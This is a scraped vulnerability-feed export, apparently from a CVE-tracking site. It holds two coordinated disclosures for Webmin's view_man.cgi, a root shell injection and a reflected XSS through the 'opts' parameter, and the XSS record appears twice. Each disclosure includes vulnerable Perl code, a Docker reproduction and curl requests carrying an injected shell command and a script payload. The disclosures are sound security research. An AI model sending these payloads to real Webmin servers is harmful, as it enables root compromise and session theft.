`man/view_man.cgi` \u2014 Authenticated Shell Injection via `opts` Parameter (RCE \u2192 root)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` constructs a shell command from the user-supplied `opts` CGI parameter without proper neutralization. An authenticated user with access to the \"Manual Pages\" module can inject shell metacharacters via `opts`, leading to arbitrary command execution as the Webmin server process (root by default, since `miniserv` forks CGI handlers as root).\n\nThe vulnerable code path is only reached when the configured `man2html_path` points to **Earl Hood's Perl `man2html` version 3.0 or later**. This is the default on Arch Linux (`man2html 3.0.1-10`) and FreeBSD ports (`3.1.x`). On Debian / Ubuntu / Fedora / RHEL, the legacy Hamilton C `man2html 1.6g` ships by default and is not affected by this finding (but is affected by a companion XSS \u2014 see separate disclosure).\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to Earl Hood Perl `man2html` v3.0+\n- **Privilege required**: authenticated Webmin user with the \"Manual Pages\" module ACL\n\n## Vulnerable Code\n\n`man/view_man.cgi` (lines 72-77, pre-patch):\n\n```perl\n$manout = &backquote_command(\"$config{'man2html_path'} -v 2>&1\", 1);\nif ($manout =~ /Version:\\s+([0-9\\.]+)/i && $1 >= 3) {\n # New version uses a different syntax!\n $cmd .= \" $qout | nroff -mman | $config{'man2html_path'} --cgiurl \\\"view_man.cgi?page=\\\\\\${title}&sec=\\\\\\${section}&opts=$in{'opts'}\\\" --bare\";\n $out = &backquote_command(\"$cmd 2>&1\", 1);\n}\n```\n\nThe `$in{'opts'}` variable is interpolated directly into the shell-quoted `--cgiurl` argument, then the whole string is passed to `backquote_command()` for execution. Shell metacharacters (`;`, `` ` ``, `$()`, `|`, etc.) in `opts` escape the intended context.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Earl Hood man2html >=3.0\ndocker run -d --name webmin-poc -p 10000:10000 \\\n -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n apt-get update && apt-get install -y wget perl libnet-ssleay-perl openssl\n # Install Webmin 2.641 ...\n # Install Earl Hood man2html >=3.0 (or stub binary returning \"Version: 3.0.1\" on -v)\n # Create low-priv user \"classb\" with Manual Pages module ACL granted\n'\n\n# Login as low-priv user\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=classb&pass=ClassB!2026\" \\\n https://localhost:10000/session_login.cgi\n\n# Trigger the RCE\ncurl -k -b $COOKIE \\\n \"https://localhost:10000/man/view_man.cgi?page=ls&sec=1&opts=%22%3Btouch%20%2Ftmp%2Fpwn-by-%24%28id%20-u%29%3Becho%20%22\"\n\n# Verify marker file created as root (uid=0)\ndocker exec webmin-poc ls -la /tmp/pwn-by-0\n# -rw-r--r-- 1 root root 0 May 14 23:17 /tmp/pwn-by-0\n```\n\nThe URL-decoded `opts` payload is: `\";touch /tmp/pwn-by-$(id -u);echo \"` \u2014 closes the quote, executes `touch`, then re-opens quote to keep the rest of the shell command syntactically valid.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stub `man2html` binary returning `Version: 3.0.1` on `-v`:\n\n- Marker file `/tmp/pwn-by-0` created (owner: root, mtime: 2026-05-14T23:17:03)\n- `miniserv.log` shows `127.0.0.1 - classb [...] \"GET /man/view_man.cgi?...\" 200` \u2014 confirms low-priv user attribution\n- Class-B user authenticated via standard Webmin session, no admin escalation needed at HTTP layer\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`\n- **Score**: **6.5 (High)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | High | Requires Earl Hood Perl `man2html` >=3.0 (not default on Debian/Ubuntu/Fedora/RHEL) |\n| PR | Low | Any authenticated Webmin user with \"Manual Pages\" module ACL |\n| UI | None | No user interaction |\n| Scope | Unchanged | Code runs as same root context CGI was already in |\n| C/I/A | High | Full root shell |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15\n- **Acknowledged**: 2026-05-15 (Day 0, ~7 hours after report)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n - https://github.com/webmin/webmin/commit/b251b7182cde84b20a00a90fd0ef0ed032fc6037 (primary `quotemeta` fix)\n - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &urlize(...)` + source-side fix in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. This issue is the incomplete-coverage variant on the shell-injection axis (a companion reflected XSS finding in the legacy `man2html` branch of the same file is the corresponding gap on the XSS axis).\n- **CVE-2025-67738** \u2014 Filippo Decortes, Squid module `cachemgr.cgi`, same maintainer-accept class (shell-injection in CGI arg construction). Patched via identical `quotemeta` pattern.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:25:44.000000Z"} https://vulnerability.circl.lu/sighting/54d31e2a-7aa9-4eac-9cde-9d1aa7eab7ff/export Sun, 17 May 2026 15:25:44 +0000 https://vulnerability.circl.lu/sighting/353ec918-25ea-4db6-b4ef-337aba2b582f/export {"uuid": "353ec918-25ea-4db6-b4ef-337aba2b582f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/07d76a066462f1e29cb582adfb9e16cb", "content": "# Webmin `man/view_man.cgi` \u2014 Reflected XSS via `opts` Parameter (legacy `man2html` branch)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` performs a regex substitution on the HTML output of the legacy `man2html` binary that interpolates the `opts` CGI parameter directly into the response body without HTML or URL encoding. This produces reflected XSS reachable on the default configuration of Debian, Ubuntu, Fedora, and RHEL.\n\nThe script is rendered inside the Webmin administrator UI context, allowing an attacker who lures an authenticated admin into clicking a crafted link to execute JavaScript with full admin-session privileges (session theft, configuration changes, chaining to other authenticated endpoints).\n\nThis is the `else` branch counterpart to a companion shell-injection finding (separate disclosure). The two findings together cover the entire vulnerable branch in `view_man.cgi` regardless of which `man2html` variant is installed.\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to legacy Hamilton C `man2html` (typically `1.6g-14`)\n- **Default reach**: Debian / Ubuntu / Fedora / RHEL stock \u2014 **default-config exploitable on most distributions**\n- **Privilege required**: none (attacker is unauthenticated; victim must be an authenticated Webmin admin who clicks the crafted link)\n\n## Vulnerable Code\n\n`man/view_man.cgi` (line 85, pre-patch):\n\n```perl\nelse {\n # Old version of man2html\n $cmd .= \" $qout | $config{'man2html_path'} -H \\\"\\\" -M \\\"view_man.cgi\\\"\";\n $out = &backquote_command(\"$cmd 2>&1\", 1);\n $out =~ s/^.*Content-type:.*\\n//i;\n $out =~ s/http:\\/\\///ig;\n $out =~ s/\\?/\\?sec=/ig;\n $out =~ s/\\+/&opts=$in{'opts'}&page=/ig; # \u2190 XSS sink: $in{'opts'} interpolated unescaped\n $out =~ s/.*//isg;\n ...\n}\n```\n\nThe regex substitution replaces every `+` character in the man2html-generated HTML with the string `&opts=$in{'opts'}&page=`. Because `$in{'opts'}` is interpolated verbatim into HTML output (and later passed to `&show_view_table()` for rendering), any HTML/JavaScript in the parameter is reflected directly into the admin UI.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Debian default man2html (Hamilton C 1.6g)\ndocker run -d --name webmin-poc -p 10000:10000 \\\n -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n apt-get update && apt-get install -y wget perl libnet-ssleay-perl openssl man2html\n # Install Webmin 2.641 ...\n'\n\n# Login as admin (or any user with Manual Pages access)\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=admin&pass=AdminPass!2026\" \\\n https://localhost:10000/session_login.cgi\n\n# Baseline: count in benign response\ncurl -k -b $COOKIE \\\n \"https://localhost:10000/man/view_man.cgi?page=ls&sec=1&opts=BENIGN\" \\\n | grep -c 'alert(\"VERIFY_TOKEN\")'\n# 5 (literal payload reflected 5 times, unescaped)\n```\n\nURL-decoded `opts` payload: `alert(\"VERIFY_TOKEN\")`. The reflected response body contains the literal string verbatim (5 occurrences), in the form `&opts=alert(\"VERIFY_TOKEN\")&page=FORMAT` inside `` constructs.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stock Debian 12 `man2html 1.6g-14`:\n\n- HTTP 200 response of 78747 bytes\n- Literal `alert(\"VERIFY_TOKEN\")` reflected **5 times** in response body, all unescaped\n- Baseline request (benign opts value) returns **0** `` occurrences \u2014 confirming the script tags came from attacker input, not from man2html output\n- Sample reflection (verbatim line from response): `&opts=alert(\"VERIFY_TOKEN\")&page=FORMAT`\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`\n- **Score**: **6.1 (Medium)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | Low | Default configuration on most distributions |\n| PR | None | Vulnerable handler reachable without authentication; impact requires authenticated admin victim |\n| UI | Required | Admin must click the malicious link |\n| Scope | Changed | Script runs in the Webmin admin UI security context, separate from CGI handler context |\n| C/I/A | Low / Low / None | Session cookies and DOM exposed; admin-session writes possible |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15 (alongside companion shell-injection finding)\n- **Acknowledged**: 2026-05-15 (Day 0)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n - https://github.com/webmin/webmin/commit/8159fad28f50193f6405786f21768caf13820c11 (primary `html_escape` fix)\n - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &urlize(...)` \u2014 `urlize` is a semantically better match for URL-attribute context than `html_escape`; also adds defense-in-depth `&urlize()` at the link-generation site in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. This issue is the incomplete-coverage variant of the 2017 \"Escape untrusted params\" patch series on the XSS axis.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:25:46.000000Z"} {"uuid": "353ec918-25ea-4db6-b4ef-337aba2b582f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/07d76a066462f1e29cb582adfb9e16cb", "content": "# Webmin `man/view_man.cgi` \u2014 Reflected XSS via `opts` Parameter (legacy `man2html` branch)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` performs a regex substitution on the HTML output of the legacy `man2html` binary that interpolates the `opts` CGI parameter directly into the response body without HTML or URL encoding. This produces reflected XSS reachable on the default configuration of Debian, Ubuntu, Fedora, and RHEL.\n\nThe script is rendered inside the Webmin administrator UI context, allowing an attacker who lures an authenticated admin into clicking a crafted link to execute JavaScript with full admin-session privileges (session theft, configuration changes, chaining to other authenticated endpoints).\n\nThis is the `else` branch counterpart to a companion shell-injection finding (separate disclosure). The two findings together cover the entire vulnerable branch in `view_man.cgi` regardless of which `man2html` variant is installed.\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to legacy Hamilton C `man2html` (typically `1.6g-14`)\n- **Default reach**: Debian / Ubuntu / Fedora / RHEL stock \u2014 **default-config exploitable on most distributions**\n- **Privilege required**: none (attacker is unauthenticated; victim must be an authenticated Webmin admin who clicks the crafted link)\n\n## Vulnerable Code\n\n`man/view_man.cgi` (line 85, pre-patch):\n\n```perl\nelse {\n # Old version of man2html\n $cmd .= \" $qout | $config{'man2html_path'} -H \\\"\\\" -M \\\"view_man.cgi\\\"\";\n $out = &backquote_command(\"$cmd 2>&1\", 1);\n $out =~ s/^.*Content-type:.*\\n//i;\n $out =~ s/http:\\/\\///ig;\n $out =~ s/\\?/\\?sec=/ig;\n $out =~ s/\\+/&opts=$in{'opts'}&page=/ig; # \u2190 XSS sink: $in{'opts'} interpolated unescaped\n $out =~ s/.*//isg;\n ...\n}\n```\n\nThe regex substitution replaces every `+` character in the man2html-generated HTML with the string `&opts=$in{'opts'}&page=`. Because `$in{'opts'}` is interpolated verbatim into HTML output (and later passed to `&show_view_table()` for rendering), any HTML/JavaScript in the parameter is reflected directly into the admin UI.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Debian default man2html (Hamilton C 1.6g)\ndocker run -d --name webmin-poc -p 10000:10000 \\\n -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n apt-get update && apt-get install -y wget perl libnet-ssleay-perl openssl man2html\n # Install Webmin 2.641 ...\n'\n\n# Login as admin (or any user with Manual Pages access)\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=admin&pass=AdminPass!2026\" \\\n https://localhost:10000/session_login.cgi\n\n# Baseline: count in benign response\ncurl -k -b $COOKIE \\\n \"https://localhost:10000/man/view_man.cgi?page=ls&sec=1&opts=BENIGN\" \\\n | grep -c 'alert(\"VERIFY_TOKEN\")'\n# 5 (literal payload reflected 5 times, unescaped)\n```\n\nURL-decoded `opts` payload: `alert(\"VERIFY_TOKEN\")`. The reflected response body contains the literal string verbatim (5 occurrences), in the form `&opts=alert(\"VERIFY_TOKEN\")&page=FORMAT` inside `` constructs.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stock Debian 12 `man2html 1.6g-14`:\n\n- HTTP 200 response of 78747 bytes\n- Literal `alert(\"VERIFY_TOKEN\")` reflected **5 times** in response body, all unescaped\n- Baseline request (benign opts value) returns **0** `` occurrences \u2014 confirming the script tags came from attacker input, not from man2html output\n- Sample reflection (verbatim line from response): `&opts=alert(\"VERIFY_TOKEN\")&page=FORMAT`\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`\n- **Score**: **6.1 (Medium)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | Low | Default configuration on most distributions |\n| PR | None | Vulnerable handler reachable without authentication; impact requires authenticated admin victim |\n| UI | Required | Admin must click the malicious link |\n| Scope | Changed | Script runs in the Webmin admin UI security context, separate from CGI handler context |\n| C/I/A | Low / Low / None | Session cookies and DOM exposed; admin-session writes possible |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15 (alongside companion shell-injection finding)\n- **Acknowledged**: 2026-05-15 (Day 0)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n - https://github.com/webmin/webmin/commit/8159fad28f50193f6405786f21768caf13820c11 (primary `html_escape` fix)\n - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &urlize(...)` \u2014 `urlize` is a semantically better match for URL-attribute context than `html_escape`; also adds defense-in-depth `&urlize()` at the link-generation site in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. This issue is the incomplete-coverage variant of the 2017 \"Escape untrusted params\" patch series on the XSS axis.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:25:46.000000Z"} https://vulnerability.circl.lu/sighting/353ec918-25ea-4db6-b4ef-337aba2b582f/export Sun, 17 May 2026 15:25:46 +0000